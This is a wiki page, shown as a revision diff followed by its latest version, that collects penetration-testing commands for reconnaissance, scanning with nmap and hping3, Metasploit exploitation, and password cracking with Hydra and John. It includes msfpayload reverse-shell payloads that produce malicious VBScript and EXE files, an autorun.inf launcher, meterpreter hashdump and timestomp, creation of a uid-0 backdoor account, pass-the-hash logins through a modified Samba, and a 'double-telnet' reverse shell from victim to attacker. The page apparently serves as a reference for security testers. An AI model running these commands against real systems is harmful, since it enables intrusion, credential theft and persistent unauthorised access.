Difference between revisions of "Linux Commands"

From SkullSecurity
Jump to navigation Jump to search
 
(27 intermediate revisions by 3 users not shown)
Line 11: Line 11:


* Zone transfer
* Zone transfer
<pre>$ dig [@server] &lt;domain&gt; -t AXFR
<pre>$ dig [@server] &lt;domain&gt; -t AXFR</pre>


* Iterative zone transfer
* Iterative zone transfer
Line 23: Line 23:
$ ./qtrace.pl
$ ./qtrace.pl
</pre>
</pre>
===snmpwalk===
Dump the ARP table of an snmp server at HOST
<pre>$ snmpwalk -v 2c -c &lt;community&gt; &lt;server&gt; ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress > arptable.dump</pre>


==Scanning==
==Scanning==
===tcpdump===
===tcpdump===
Parameters:
Parameters
* -n -- use numbers
* -n -- use numbers
* -i &lt;interface&gt;
* -i &lt;interface&gt;
Line 35: Line 39:
* -X -- print hex and ASCII
* -X -- print hex and ASCII
* -s &lt;snaplen&gt; -- length to capture (-s0 for all data)
* -s &lt;snaplen&gt; -- length to capture (-s0 for all data)
Filter string
* Protocol
** ether, ip, ip6, arp, rarp, tcp, udp
* Type
** host &lt;host&gt;
** net &lt;network&gt;
** port &lt;portnum&gt;
** portrange &lt;start-end&gt;
* Direction
** src
** dst
* Logic
** and
** or
* Show TCP against target 10.10.10.10 in ASCII
<pre>tcpdump [-i tap0] -n -A tcp and dst 10.10.10.10</pre>
* Show all UDP from 10.10.10.10
<pre>tcpdump [-i tap0] -n udp and src 10.10.10.10</pre>
* Show all TCP port 80 packets going to or from host 10.10.10.10
<pre>tcpdump [-i tap0] -n tcp and port 80 and host 10.10.10.10</pre>
===hping3===
TCP Flags
* --syn, --fin, --rst, --push, --ack, --urg
Target selection
* --rand-dest
* --interface &lt;int&gt;
Source selection
* --spoof &lt;hostname&gt;
* --rand-source
Port selection
* --destport &lt;port&gt;
* --destport +&lt;port&gt; -- increment by one for each packet received
* --destport ++&lt;port&gt; -- increment by one for each packet sent
* --scan &lt;portrange&gt;
* --baseport &lt;port&gt;
* --keep -- don't increment the source port
Speed options
* --fast, --faster, --flood
* --interval &lt;N&gt; -- interval in seconds
* --interval u&lt;N&gt; -- interval in microseconds
Other options
* --count &lt;N&gt;
* --beep
* --file &lt;filename&gt;
* --data &lt;N&gt;
===traceroute===
Parameters
* -f &lt;N&gt; -- Initial TTL
* -g &lt;hostlist&gt; -- Loose source route
* -I -- use ICMP Echo instead of UDP
* -m &lt;N&gt; -- maximum number of hops (default 30)
* -n -- numeric
* -p &lt;baseport&gt; -- set the base UDP port
* -w &lt;N&gt; -- wait N seconds (default 5)
===Layer Four Traceroute (lft)===
http://pwhois.org/lft/index.who
Options
* -u -- use UDP
* -p -- use ICMP echo
* -d &lt;port&gt; -- destination port (default 80)
* -s &lt;port&gt; -- source port
* -L &lt;N&gt; -- length (including layer 3/4 header)
* -A -- look up AS number
* -P -- traceroute via tcp
===nmap===
Pinging
* -PN -- don't ping
* -PB -- default, ICMP Echo + TCP to port 80
* -PE -- ICMP Echo request
* -PS[portlist] -- TCP SYN
* -PP -- ICMP Timestamp request
* -PM -- ICMP Address Mask request
* -PR -- default on subnet, use ARP to identify hosts
Scanning
* -sT -- TCP Connect scan
* -sS -- SYN scan
* -sA -- ACK scan
* -sF -- FIN scan
* -sN -- Null scan
* -sX -- Xmas Tree scan
* -sM -- Maimon scan
* --scanflags specify your own flags
* -sU -- UDP scan
Fingerprinting
* -O -- OS fingerprint
* -sV -- Version scan
Scripts
* -sC -- run all scripts
* --script=&lt;category,dir,src,etc&/gt;
* --script-trace
Timing
* --paranoid, --sneaky, --polite, --normal, --aggressive, --insane
* --host_timeout, --max_rtt_timeout, --min-rtt-timeout, --initial_rtt_timeout, --max-parallelism, --scan_delay
Other options
* -p&lt;ports&gt;
* -F -- fast (checks ''only'' ports in nmap-services)
* --packet-trace
* --traceroute
* --badsum
===THC amap===
Options
* -q -- quiet (omit closed ports)
* -v -- verbose
* -b -- print banners
Example:
<pre>amap -bqv 10.10.10.10 1-50</pre>
===Enumerating users===
Commands
<pre>$ cat /etc/passwd</pre>
<pre>$ finger</pre>
<pre>$ who</pre>
<pre>$ w</pre>
Remotely:
<pre>$ finger @&lt;target&gt;</pre>
==Exploitation==
===netcat===
Options
* -l -- listen mode
* -L -- listen harder (Windows only)
* -u -- UDP mode
* -p -- local port (in listen mode, the port to listen on)
* -e -- program to execute
* -n -- don't resolve names
* -z -- don't send any data
* -w&lt;N&gt; -- timeout for connects
* -v/-vv -- be verbose
Scanning
<pre>echo "" | nc -v -n -w1 &lt;target&gt; &lt;port-range&gt;</pre>
Setting up a relay
<pre>mknod backpipe p
nc -l -p &lt;allowed_port&gt; &lt; backpipe | nc &lt;host&gt; &lt;port&gt; &gt; backpipe</pre>
Relaying port 22 to the local system
<pre>mknod backpipe p
nc -l -p &lt;allowed_port&gt; &lt; backpipe | nc localhost 22 &gt; backpipe</pre>
===Finding SetUID/SetGID programs===
<pre>find / -type f \( -perm -4000 -o -perm -2000 \) -print</pre>
<pre>find /bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
</pre>
<pre>for i in `locate -r "bin$"`; do find $i -type f \( -perm -4000 -o -perm -2000 \) -print; done</pre>
===Metasploit===
Running an exploit
<pre>msf&gt; show exploits
msf&gt; use exploit/windows/smf/ms05_039_php
msf&gt; show payloads
msf&gt; set PAYLOAD windows/shell/bind_tcp
msf&gt; show options
msf&gt; set RHOST 10.10.10.10
msf&gt; exploit
</pre>
Interacting with sessions
<pre>
msf&gt; sessions -l
msf&gt; sessions -i &lt;N&gt;
</pre>
Creating a malicious VBScript
<pre>
$ msfpayload windows/meterpreter/reverse_tcp LHOST=&lt;lhost&gt; V
$ msfpayload windows/vncinject/reverse_tcp LHOST=&lt;lhost&gt; DisableCourtesyShell=y V
</pre>
Creating a malicious Exe
<pre>
$ msfpayload windows/meterpreter/reverse_tcp LHOST=&lt;lhost&gt; X
$ msfpayload windows/vncinject/reverse_tcp LHOST=&lt;lhost&gt; DisableCourtesyShell=y X
</pre>
Example autorun.inf file to run a malicious exe (goes with Metasploit)
<pre>
[autorun]
open=example.exe
icon=example.exe
</pre>
Metasploit listener
<pre>
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=&lt;lhost&gt; E
$ msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=&lt;lhost&gt; DisableCourtesyShell=y E
</pre>
===Meterpreter===
Filesystem commands
<pre>&gt; cd
&gt; lcd
&gt; pwd / getwd
&gt; ls
&gt; cat
&gt; download / upload
&gt; mkdir / rmdir
&gt; edit
&gt; getpid
&gt; getuid
&gt; ps
&gt; kill
&gt; execute
&gt; migrate
&gt; ipconfig
&gt; portfwd
&gt; route
&gt; idletime
&gt; uictl &lt;enable/disable&gt; &lt;keyboard/mouse&gt;
</pre>
Modules
<pre>&gt; use &lt;modulename&gt;
&gt; use priv
&gt; hashdump
&gt; timestomp</pre>
===Creating a user===
Adding an ordinary user
<pre>useradd &lt;name&gt;</pre>
Adding a root user (note: a non-uid-0 account may be required to log in)
<pre>useradd -o -u 0 &lt;name&gt;</pre>
===telnet===
Checking for inetd/xinetd
<pre>ps aux | grep inetd</pre>
Adding telnet to /etc/inetd
<pre>telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd</pre>
Adding telnet to xinetd
* Steal the file from a service that's running (files are in /etc/xinetd.d)
* Change server to "/usr/sbin/in.telnetd"
Restarting inetd/xinetd (the "kill" command with the PID can also be used)
<pre>killall -HUP inetd
killall -HUP xinetd
</pre>
===sshd===
File should be in /etc/rc*. Ways to enable:
<pre>chkconfig sshd on
service sshd start
/etc/init.d/sshd start</pre>
==Passwords==
===Dictionaries===
Creating a dictionary
<pre>cat wordlist.txt | sort | uniq > dictionary.txt</pre>
Scraping a Web site
<pre>mkdir /tmp/source
cd /tmp/source
wget -r -l &lt;N&gt; &lt;target&gt;
cd ..
grep -h -r "" source | tr '[:space:]' '\n' | grep -v '&lt;' | sort | uniq &gt; wordlist.lst</pre>
Or, just use [[Passwords|my dictionaries]]
===Account lockout===
<pre>grep tally /etc/pam.d/*
grep tally /etc/pam.conf</pre>
===pw-inspector===
Options
* -i -- input file
* -o -- output file
* -m &lt;N&gt; -- minimum length
* -M &lt;N&gt; -- maximum length
* -c &lt;N&gt; -- the number of criteria
** -l -- lower case
** -u -- upper case
** -n -- numbers
** -p -- printable characters (lower/upper/num)
** -s -- special characters (all others)
Example
<pre>cat /tmp/password.list | pw-inspector -m 6 -n -u -l -c 2</pre>
===Hydra===
Options
* -l &lt;username&gt;/-L &lt;userfile&gt; -- Login name/file
* -p &lt;password&gt;/-P &lt;passfile&gt; -- Password/file
* -e &lt;n|s|ns&gt; -- extended checks (n = null, s = same as username)
* -t &lt;N&gt; -- thread count
<pre>hydra &lt;host&gt; &lt;protocol&gt; &lt;-l &lt;username&gt;|-L &lt;userfile&gt;&gt; &lt;-p &lt;password&gt;|-P &lt;passfile&gt;&gt; [-e &lt;n|s|ns&gt;] [-t &lt;threads&gt;]</pre>
smb password
<pre>hydra &lt;host&gt; smb -l george -P ./list.lst -e ns</pre>
ssh password
<pre>hydra &lt;host&gt; ssh2 -l george -P ./list.lst -e ns</pre>
===John===
Show cracked passwords
<pre>john --show &lt;passwordfile&gt;</pre>
Speed test
<pre>john --test</pre>
Running against a password file
<pre>john &lt;passwordfile&gt;</pre>
Specifying type type
<pre>john --format=&lt;format&gt; &lt;passwordfile&gt;
john --format=nt /tmp/pwdump</pre>
Combining passwd/shadow
<pre>unshadow &lt;passwdfile&gt; &lt;shadowfile&gt; &gt; combined.txt
john combined.txt</pre>
===Modified Samba===
Loading the hash
<pre>export SMBHASH="&lt;LANMAN&gt;:&lt;NT&gt;"
echo $SMBHASH</pre>
Mounting a drive
<pre>./smbmount //&lt;target&gt;/&lt;share&gt; &lt;mountpoint&gt; -o username=&lt;username&gt;
./smbmount //10.10.10.10/c$ /mnt/target -o username=administrator
</pre>
Adding a user
<pre>./net user ADD &lt;username&gt; &lt;password&gt; -I &lt;target&gt; -U &lt;admin_username&gt;
./net rpc group ADDMEM administrators &lt;username&gt; -I &lt;target&gt; -U &lt;admin_username&gt;</pre>
==Web==
===nikto.pl===
Scanning
<pre>nikto.pl -h &lt;host&gt;</pre>
Updating
<pre>nikto.pl -update</pre>
Single check
<pre>nikto.pl -Single</pre>
==Fancy tricks==
===Double-telnet===
On the attacker machine
<pre>nc -l -p 4444
nc -l -p 5555</pre>
On the victim machine
<pre>telnet &lt;attacker&gt; 4444 | cmd.exe | telnet &lt;attacker&gt; 5555

Latest revision as of 09:11, 21 January 2011

Recon

whois

$ whois [-h whois_server] name

nslookup

$ nslookup <target>

dig

  • Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
$ dig [@server] <name> [type]
  • Zone transfer
$ dig [@server] <domain> -t AXFR
  • Iterative zone transfer
$ dig [@server] <domain> -t IXFR=<N>

BiLE.pl

$ ./BiLE <target> <result_file>
$ ./BiLE-weigh.pl <site_of_interest> <BiLE_output.mine>
$ ./tld-expand.pl
$ ./vet-IPrange.pl
$ ./qtrace.pl

snmpwalk

Dump the ARP table of an snmp server at HOST

$ snmpwalk -v 2c -c <community> <server> ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress > arptable.dump

Scanning

tcpdump

Parameters

  • -n -- use numbers
  • -i <interface>
  • -v -- be verbose
  • -r <file>/-w <file> -- read from/write to file
  • -x -- print hex
  • -A -- print ASCII
  • -X -- print hex and ASCII
  • -s <snaplen> -- length to capture (-s0 for all data)

Filter string

  • Protocol
    • ether, ip, ip6, arp, rarp, tcp, udp
  • Type
    • host <host>
    • net <network>
    • port <portnum>
    • portrange <start-end>
  • Direction
    • src
    • dst
  • Logic
    • and
    • or
  • Show TCP against target 10.10.10.10 in ASCII
tcpdump [-i tap0] -n -A tcp and dst 10.10.10.10
  • Show all UDP from 10.10.10.10
tcpdump [-i tap0] -n udp and src 10.10.10.10
  • Show all TCP port 80 packets going to or from host 10.10.10.10
tcpdump [-i tap0] -n tcp and port 80 and host 10.10.10.10

hping3

TCP Flags

  • --syn, --fin, --rst, --push, --ack, --urg

Target selection

  • --rand-dest
  • --interface <int>

Source selection

  • --spoof <hostname>
  • --rand-source

Port selection

  • --destport <port>
  • --destport +<port> -- increment by one for each packet received
  • --destport ++<port> -- increment by one for each packet sent
  • --scan <portrange>
  • --baseport <port>
  • --keep -- don't increment the source port

Speed options

  • --fast, --faster, --flood
  • --interval <N> -- interval in seconds
  • --interval u<N> -- interval in microseconds

Other options

  • --count <N>
  • --beep
  • --file <filename>
  • --data <N>

traceroute

Parameters

  • -f <N> -- Initial TTL
  • -g <hostlist> -- Loose source route
  • -I -- use ICMP Echo instead of UDP
  • -m <N> -- maximum number of hops (default 30)
  • -n -- numeric
  • -p <baseport> -- set the base UDP port
  • -w <N> -- wait N seconds (default 5)

Layer Four Traceroute (lft)

http://pwhois.org/lft/index.who

Options

  • -u -- use UDP
  • -p -- use ICMP echo
  • -d <port> -- destination port (default 80)
  • -s <port> -- source port
  • -L <N> -- length (including layer 3/4 header)
  • -A -- look up AS number
  • -P -- traceroute via tcp

nmap

Pinging

  • -PN -- don't ping
  • -PB -- default, ICMP Echo + TCP to port 80
  • -PE -- ICMP Echo request
  • -PS[portlist] -- TCP SYN
  • -PP -- ICMP Timestamp request
  • -PM -- ICMP Address Mask request
  • -PR -- default on subnet, use ARP to identify hosts

Scanning

  • -sT -- TCP Connect scan
  • -sS -- SYN scan
  • -sA -- ACK scan
  • -sF -- FIN scan
  • -sN -- Null scan
  • -sX -- Xmas Tree scan
  • -sM -- Maimon scan
  • --scanflags specify your own flags
  • -sU -- UDP scan

Fingerprinting

  • -O -- OS fingerprint
  • -sV -- Version scan

Scripts

  • -sC -- run all scripts
  • --script=<category,dir,src,etc&/gt;
  • --script-trace

Timing

  • --paranoid, --sneaky, --polite, --normal, --aggressive, --insane
  • --host_timeout, --max_rtt_timeout, --min-rtt-timeout, --initial_rtt_timeout, --max-parallelism, --scan_delay

Other options

  • -p<ports>
  • -F -- fast (checks only ports in nmap-services)
  • --packet-trace
  • --traceroute
  • --badsum

THC amap

Options

  • -q -- quiet (omit closed ports)
  • -v -- verbose
  • -b -- print banners

Example:

amap -bqv 10.10.10.10 1-50

Enumerating users

Commands

$ cat /etc/passwd
$ finger
$ who
$ w

Remotely:

$ finger @<target>

Exploitation

netcat

Options

  • -l -- listen mode
  • -L -- listen harder (Windows only)
  • -u -- UDP mode
  • -p -- local port (in listen mode, the port to listen on)
  • -e -- program to execute
  • -n -- don't resolve names
  • -z -- don't send any data
  • -w<N> -- timeout for connects
  • -v/-vv -- be verbose

Scanning

echo "" | nc -v -n -w1 <target> <port-range>

Setting up a relay

mknod backpipe p
nc -l -p <allowed_port> < backpipe | nc <host> <port> > backpipe

Relaying port 22 to the local system

mknod backpipe p
nc -l -p <allowed_port> < backpipe | nc localhost 22 > backpipe

Finding SetUID/SetGID programs

find / -type f \( -perm -4000 -o -perm -2000 \) -print
find /bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
for i in `locate -r "bin$"`; do find $i -type f \( -perm -4000 -o -perm -2000 \) -print; done

Metasploit

Running an exploit

msf> show exploits
msf> use exploit/windows/smf/ms05_039_php
msf> show payloads
msf> set PAYLOAD windows/shell/bind_tcp
msf> show options
msf> set RHOST 10.10.10.10
msf> exploit

Interacting with sessions

msf> sessions -l
msf> sessions -i <N>

Creating a malicious VBScript

$ msfpayload windows/meterpreter/reverse_tcp LHOST=<lhost> V
$ msfpayload windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y V

Creating a malicious Exe

$ msfpayload windows/meterpreter/reverse_tcp LHOST=<lhost> X
$ msfpayload windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y X

Example autorun.inf file to run a malicious exe (goes with Metasploit)

[autorun]
open=example.exe
icon=example.exe

Metasploit listener

$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=<lhost> E
$ msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y E

Meterpreter

Filesystem commands

> cd
> lcd 
> pwd / getwd
> ls
> cat
> download / upload
> mkdir / rmdir
> edit
> getpid
> getuid
> ps
> kill
> execute
> migrate
> ipconfig
> portfwd
> route
> idletime
> uictl <enable/disable> <keyboard/mouse>

Modules

> use <modulename>
> use priv
> hashdump
> timestomp

Creating a user

Adding an ordinary user

useradd <name>

Adding a root user (note: a non-uid-0 account may be required to log in)

useradd -o -u 0 <name>

telnet

Checking for inetd/xinetd

ps aux | grep inetd

Adding telnet to /etc/inetd

telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd

Adding telnet to xinetd

  • Steal the file from a service that's running (files are in /etc/xinetd.d)
  • Change server to "/usr/sbin/in.telnetd"

Restarting inetd/xinetd (the "kill" command with the PID can also be used)

killall -HUP inetd
killall -HUP xinetd

sshd

File should be in /etc/rc*. Ways to enable:

chkconfig sshd on
service sshd start
/etc/init.d/sshd start

Passwords

Dictionaries

Creating a dictionary

cat wordlist.txt | sort | uniq > dictionary.txt

Scraping a Web site

mkdir /tmp/source
cd /tmp/source
wget -r -l <N> <target>
cd ..
grep -h -r "" source | tr '[:space:]' '\n' | grep -v '<' | sort | uniq > wordlist.lst

Or, just use my dictionaries

Account lockout

grep tally /etc/pam.d/*
grep tally /etc/pam.conf

pw-inspector

Options

  • -i -- input file
  • -o -- output file
  • -m <N> -- minimum length
  • -M <N> -- maximum length
  • -c <N> -- the number of criteria
    • -l -- lower case
    • -u -- upper case
    • -n -- numbers
    • -p -- printable characters (lower/upper/num)
    • -s -- special characters (all others)

Example

cat /tmp/password.list | pw-inspector -m 6 -n -u -l -c 2

Hydra

Options

  • -l <username>/-L <userfile> -- Login name/file
  • -p <password>/-P <passfile> -- Password/file
  • -e <n|s|ns> -- extended checks (n = null, s = same as username)
  • -t <N> -- thread count
hydra <host> <protocol> <-l <username>|-L <userfile>> <-p <password>|-P <passfile>> [-e <n|s|ns>] [-t <threads>]

smb password

hydra <host> smb -l george -P ./list.lst -e ns

ssh password

hydra <host> ssh2 -l george -P ./list.lst -e ns

John

Show cracked passwords

john --show <passwordfile>

Speed test

john --test

Running against a password file

john <passwordfile>

Specifying type type

john --format=<format> <passwordfile>
john --format=nt /tmp/pwdump

Combining passwd/shadow

unshadow <passwdfile> <shadowfile> > combined.txt
john combined.txt

Modified Samba

Loading the hash

export SMBHASH="<LANMAN>:<NT>"
echo $SMBHASH

Mounting a drive

./smbmount //<target>/<share> <mountpoint> -o username=<username>
./smbmount //10.10.10.10/c$ /mnt/target -o username=administrator

Adding a user

./net user ADD <username> <password> -I <target> -U <admin_username>
./net rpc group ADDMEM administrators <username> -I <target> -U <admin_username>

Web

nikto.pl

Scanning

nikto.pl -h <host>

Updating

nikto.pl -update

Single check

nikto.pl -Single

Fancy tricks

Double-telnet

On the attacker machine

nc -l -p 4444
nc -l -p 5555

On the victim machine

telnet <attacker> 4444 | cmd.exe | telnet <attacker> 5555